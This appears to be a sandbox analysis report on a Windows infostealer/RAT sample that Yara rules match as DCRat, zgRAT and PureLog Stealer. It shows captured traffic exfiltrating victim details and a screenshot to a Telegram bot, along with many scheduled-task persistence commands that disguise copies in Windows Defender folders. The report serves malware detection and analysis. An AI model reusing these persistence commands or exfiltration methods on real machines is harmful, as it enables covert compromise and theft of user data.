2024-12-31 20:06:13 UTC	140	OUT	Data Raw: 6e 65 77 20 75 73 65 72 20 63 6f 6e 6e 65 63 74 20 21 0a 49 44 3a 20 30 30 63 33 64 39 39 33 30 62 62 35 33 66 31 32 64 61 37 66 64 65 32 66 35 33 39 39 32 62 32 61 35 63 39 39 30 32 39 64 0a 43 6f 6d 6d 65 6e 74 3a 20 4e 45 57 4f 52 4b 20 50 43 0a 55 73 65 72 6e 61 6d 65 3a 20 6a 6f 6e 65 73 0a 50 43 20 4e 61 6d 65 3a 20 33 30 31 33 38 39 0a 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a 47 45 4f 3a 20 55 53 0a Data Ascii: new user connect !ID: 00c3d9930bb53f12da7fde2f53992b2a5c99029dComment: NEWORK PCUsername: userPC Name: 301389IP: 8.46.123.189GEO: US
2024-12-31 20:06:13 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-31 20:06:13 UTC	146	OUT	Data Raw: 0d 0a 2d 2d 30 64 31 30 31 36 61 39 2d 62 36 64 32 2d 34 34 34 37 2d 62 32 63 33 2d 63 65 39 31 35 30 65 63 66 62 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a Data Ascii: --0d1016a9-b6d2-4447-b2c3-ce9150ecfb94Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
2024-12-31 20:06:13 UTC	4096	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
2024-12-31 20:06:13 UTC	4096	OUT	Data Raw: 76 a2 80 b8 9d 28 c6 38 a5 26 93 bf 7a 63 03 8a 43 4b 49 48 62 1c fa d2 53 b9 14 84 7f 9c d0 31 b4 a6 8f e9 49 da 81 87 e3 47 7a 3f ce 28 38 a0 04 a4 c7 38 eb 4e ed 49 da 98 c4 3d 31 41 1c d1 d8 75 a2 81 89 8c f4 a0 0a 08 14 60 e3 d6 80 10 d1 fa 51 8f 6a 0f 5a 43 01 d6 93 34 bf d6 92 80 10 d1 9a 28 3d e8 18 87 a5 1f 85 2f 7e 69 33 f5 a6 01 45 19 c5 19 fa 50 02 67 3e 94 a7 9f 6c 7b d2 1e b4 66 90 c0 75 cf e9 47 1f 9d 19 e2 8c 50 30 fc 29 b4 ee df e3 49 f8 53 00 a4 1e f4 a4 52 0e 3d a9 00 51 fe 73 40 eb 45 03 03 49 4b d8 d0 39 a0 06 9a 5c f3 d3 04 d1 df ad 26 71 9f e9 4c 00 f4 a3 8c d1 47 5c d2 18 63 ad 07 39 c7 eb 46 28 fc 29 80 83 93 8e b4 a6 8f f3 c5 20 3f e7 34 00 1e 7f fd 54 66 94 f5 e3 f3 a4 3f 95 21 87 4a 3a d1 49 fc a9 8c ef 28 a6 4d 2a c3 0b 48 df Data Ascii: v(8&zcCKIHbS1IGz?(88NI=1Au`QjZC4(=/~i3EPg>l{fuGP0)ISR=Qs@EIK9\&qLG\c9F() ?4Tf?!J:I(M*H
2024-12-31 20:06:13 UTC	4096	OUT	Data Raw: 22 83 eb 41 39 e2 8e de 94 00 84 7e 20 51 41 e3 de 8a 06 18 c5 14 7e 34 64 d0 02 7e 66 93 bf 6a 53 9c f6 a3 9a 06 84 a4 eb 4b 8e 79 a4 a0 04 3d a8 3d 69 71 fa 52 1e 08 a6 30 34 84 73 4b 46 3f 4f 4a 40 27 5a 05 1c d1 9f c2 98 c4 14 0a 5f 7a 4a 00 3d fa d1 c5 1d 3f 95 19 a0 62 77 1e f4 7f 9e 69 71 41 a0 04 3f ad 06 83 41 f5 a0 04 a0 f4 a5 fc 29 28 18 75 18 1e bd 28 a3 af 5f ce 93 3c 50 01 47 5f ad 28 a4 e9 40 05 25 2e 7f 01 49 40 c0 9e b4 74 e2 83 cd 04 d1 60 03 ef fa d2 52 9f c2 82 31 45 80 4e be 94 76 a0 f5 e3 f1 a2 90 ce ee 8a 5a 29 1f 2c 25 14 b4 50 02 51 41 a2 80 0a 28 a2 81 85 25 2d 14 00 94 51 45 03 0a 28 a5 14 08 4c e2 8a 5a 0d 00 14 52 51 4c 05 a5 dc 69 b9 a2 80 1d 90 7a 8a 4d aa 7a 1c 50 28 a0 04 d8 7b 73 4d c5 3f 26 97 77 ad 1a 0e e4 78 a2 a4 f9 Data Ascii: "A9~ QA~4d~fjSKy==iqR04sKF?OJ@'Z_zJ=?bwiqA?A)(u(_<PG_(@%.I@t`R1ENvZ),%PQA(%-QE(LZRQLizMzP({sM?&wx
2024-12-31 20:06:13 UTC	4096	OUT	Data Raw: de ba 7d bb 67 79 ff 00 6d bb ff 00 9e 95 cd 39 b9 41 46 a3 8f 2a b6 ce ed db 6d 3f e1 8e f8 41 46 6e 54 d4 b9 9d f7 56 4a fb eb ff 00 0e 61 dd db c9 6b f0 a7 48 8e 51 86 33 07 c7 b3 79 8c 3f 42 2b 8e af 50 f8 86 02 f8 6e 10 00 00 5d 20 00 7f ba d5 e5 f5 ea e5 53 f6 94 e7 37 d6 4d fe 47 83 9d c3 d9 d6 84 17 48 a5 f8 b0 a2 8a 2b d3 3c 60 a2 8a 29 80 a0 9a 5d fd 88 cd 33 14 53 0b 0e f9 4f b5 27 97 e8 73 49 46 68 01 0a 11 d4 53 6a 50 e4 51 95 3d 56 95 87 72 2a 2a 4d 88 7a 1c 52 18 cf 6e 68 b3 1d c8 cd 14 e2 08 ed 49 48 62 52 52 d1 40 09 45 2d 27 7a 63 10 d1 4b 49 40 09 45 2d 06 81 89 49 4b 45 03 12 8a 28 a0 02 92 96 83 40 0d a2 96 8a 06 36 8a 5c 66 92 98 c4 a2 97 14 50 17 12 8a 5a 29 00 94 7e 14 51 40 09 48 69 68 a0 62 51 41 a2 81 85 25 2d 25 00 14 94 b4 53 Data Ascii: }gym9AFm?AFnTVJakHQ3y?B+Pn] S7MGH+<`)]3SO'sIFhSjPQ=Vr*MzRnhIHbRR@E-'zcKI@E-IKE(@6\fPZ)~Q@HihbQA%-%S
2024-12-31 20:06:14 UTC	1584	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 31 Dec 2024 20:06:14 GMT Content-Type: application/json Content-Length: 1195 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":530,"from":{"id":8143016568,"is_bot":true,"first_name":"\u0411\u041e\u0422\u0418\u041a","username":"Heusjsjs628_bot"},"chat":{"id":6283373442,"first_name":"Loftan","username":"Lofty_Code","type":"private"},"date":1735675574,"photo":[{"file_id":"AgACAgEAAxkDAAICEmd0TrZF8ugUYBnrkbNR-OsDVlPzAAIZrzEbpqShR2lFBqEDB9kxAQADAgADcwADNgQ","file_unique_id":"AQADGa8xG6akoUd4","file_size":1101,"width":90,"height":72},{"file_id":"AgACAgEAAxkDAAICEmd0TrZF8ugUYBnrkbNR-OsDVlPzAAIZrzEbpqShR2lFBqEDB9kxAQADAgADbQADNgQ","file_unique_id":"AQADGa8xG6akoUdy","file_size":14110,"width":320,"height":256},{"file_id":"AgACAgEAAxkDAAICEmd0TrZF8ugUYBnrkbNR-OsDVlPzAAIZrzEbpqShR2lFBqEDB9kxAQADAgADeAADNgQ","file_unique_id":"AQADGa8xG6akoUd9","file_size":58932,"width":800,"height":640},{"file_id":"AgACAgEAAxkDAAICEmd0TrZF8ugUYBnrkbNR-OsDVlPzAAIZrzEbpqShR2lFBqEDB9kxAQADAgADeQADNgQ","file_unique_id":"AQADGa8xG6akoUd-","file_size":86732,"width":1280,"height":1024}],"caption":"new user connect !\nID: 00c3d9930bb53f [TRUNCATED]

Target ID:	0
Start time:	15:06:06
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Etqq32Yuw4.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Etqq32Yuw4.exe"
Imagebase:	0x840000
File size:	1'995'264 bytes
MD5 hash:	0F52130D0A1ABBE40D9F582B1F95A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1741585863.0000000012D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1654752792.0000000000842000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:06:09
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows defender\en-GB\gmRWetzDcocJEC.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:06:09
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "gmRWetzDcocJEC" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:06:09
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows defender\en-GB\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:06:09
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:06:09
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "gmRWetzDcocJEC" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:06:09
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 8 /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:06:09
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 11 /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:06:09
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "gmRWetzDcocJEC" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:06:09
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 6 /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:06:09
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:06:09
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "gmRWetzDcocJEC" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:06:10
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:06:10
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Windows\CbsTemp\System.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:06:10
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\CbsTemp\System.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:06:10
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Windows\CbsTemp\System.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:06:10
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "Etqq32Yuw4E" /sc MINUTE /mo 5 /tr "'C:\Users\user\Desktop\Etqq32Yuw4.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:06:10
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "Etqq32Yuw4" /sc ONLOGON /tr "'C:\Users\user\Desktop\Etqq32Yuw4.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	15:06:10
Start date:	31/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "Etqq32Yuw4E" /sc MINUTE /mo 9 /tr "'C:\Users\user\Desktop\Etqq32Yuw4.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:06:11
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Etqq32Yuw4.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\Etqq32Yuw4.exe
Imagebase:	0xd80000
File size:	1'995'264 bytes
MD5 hash:	0F52130D0A1ABBE40D9F582B1F95A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	15:06:11
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Etqq32Yuw4.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\Etqq32Yuw4.exe
Imagebase:	0x860000
File size:	1'995'264 bytes
MD5 hash:	0F52130D0A1ABBE40D9F582B1F95A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:06:11
Start date:	31/12/2024
Path:	C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe"
Imagebase:	0x7c0000
File size:	1'995'264 bytes
MD5 hash:	0F52130D0A1ABBE40D9F582B1F95A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:06:11
Start date:	31/12/2024
Path:	C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe"
Imagebase:	0xb30000
File size:	1'995'264 bytes
MD5 hash:	0F52130D0A1ABBE40D9F582B1F95A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	15:06:11
Start date:	31/12/2024
Path:	C:\Windows\CbsTemp\System.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\CbsTemp\System.exe
Imagebase:	0xf50000
File size:	1'995'264 bytes
MD5 hash:	0F52130D0A1ABBE40D9F582B1F95A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\CbsTemp\System.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\CbsTemp\System.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\CbsTemp\System.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\CbsTemp\System.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\CbsTemp\System.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\CbsTemp\System.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	15:06:11
Start date:	31/12/2024
Path:	C:\Windows\CbsTemp\System.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\CbsTemp\System.exe
Imagebase:	0x770000
File size:	1'995'264 bytes
MD5 hash:	0F52130D0A1ABBE40D9F582B1F95A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	15:06:14
Start date:	31/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat"
Imagebase:	0x7ff735920000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	15:06:14
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	15:06:14
Start date:	31/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6688a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	15:06:14
Start date:	31/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6643f0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	15:06:19
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Etqq32Yuw4.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Etqq32Yuw4.exe"
Imagebase:	0xe0000
File size:	1'995'264 bytes
MD5 hash:	0F52130D0A1ABBE40D9F582B1F95A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FFD9B7D0D48 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

5[_H, xrefs: 00007FFD9B7D0DF3

Memory Dump Source

Source File: 00000000.00000002.1748407008.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7d0000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID: 5[_H
API String ID: 0-3279724263
Opcode ID: ed3982717dba65bc86b26b87194aa83a0321319b3b2d4e5f66e323eb1c974470
Instruction ID: 385229577e54ecd55ca72cdaaf08f9bc5e6c6a7fd65d0dfcde4864c29410e06d
Opcode Fuzzy Hash: ed3982717dba65bc86b26b87194aa83a0321319b3b2d4e5f66e323eb1c974470
Instruction Fuzzy Hash: 1691E375A09A8D8FE759DF688876BA87FE0FB95300F0502BAD049D73E6CB781419C740

Function 00007FFD9BBC9208 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BBC9282

Memory Dump Source

Source File: 00000000.00000002.1751596492.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bbc0000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e971e5487f948a9bcd8a14ca5ca5378bbe50b5bdc065d6646c33fe8b13776fd1
Instruction ID: b4da630013deb8e1545d466d91697a00ba10afd608ff1bc4ec723d5f7e505b25
Opcode Fuzzy Hash: e971e5487f948a9bcd8a14ca5ca5378bbe50b5bdc065d6646c33fe8b13776fd1
Instruction Fuzzy Hash: 57516D31E0964E9FEB59EB98C4695FDB7B1FF86304F1140BAC05EA72D2CA346A01CB50

Function 00007FFD9BBC3E58 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BBC3ED2

Memory Dump Source

Source File: 00000000.00000002.1751596492.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bbc0000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ad6f90d888a97d769db8e2d889c0bbdbfe852409b449104b5ea6d7dae039eab3
Instruction ID: d36f5b15f2318d02461677f367c9d02e7f080598d352cf87d4ae08c34f3cacd3
Opcode Fuzzy Hash: ad6f90d888a97d769db8e2d889c0bbdbfe852409b449104b5ea6d7dae039eab3
Instruction Fuzzy Hash: B6516C31E0960E8FDB59EB98C4625FDBBB1FF48304F5140BAD01AE72D6CA386A05CB50

Function 00007FFD9BBC947F Relevance: .4, Instructions: 430COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751596492.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bbc0000_Etqq32Yuw4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbac70f2d18fb810c5715bf6b6427f0b2ed91f8d7039821175f91b399edf68b9
Instruction ID: eb29760f57560ce20ce1fbfe63d9ec2ab310c4a4fa49d4e81b3ae71652339cc0
Opcode Fuzzy Hash: cbac70f2d18fb810c5715bf6b6427f0b2ed91f8d7039821175f91b399edf68b9
Instruction Fuzzy Hash: 3DF1E43061A64A8FEB59DF18C4E45B437A1FF46304B5545BDC88E8B6DBCB38E982CB41

Function 00007FFD9BBCA4C1 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

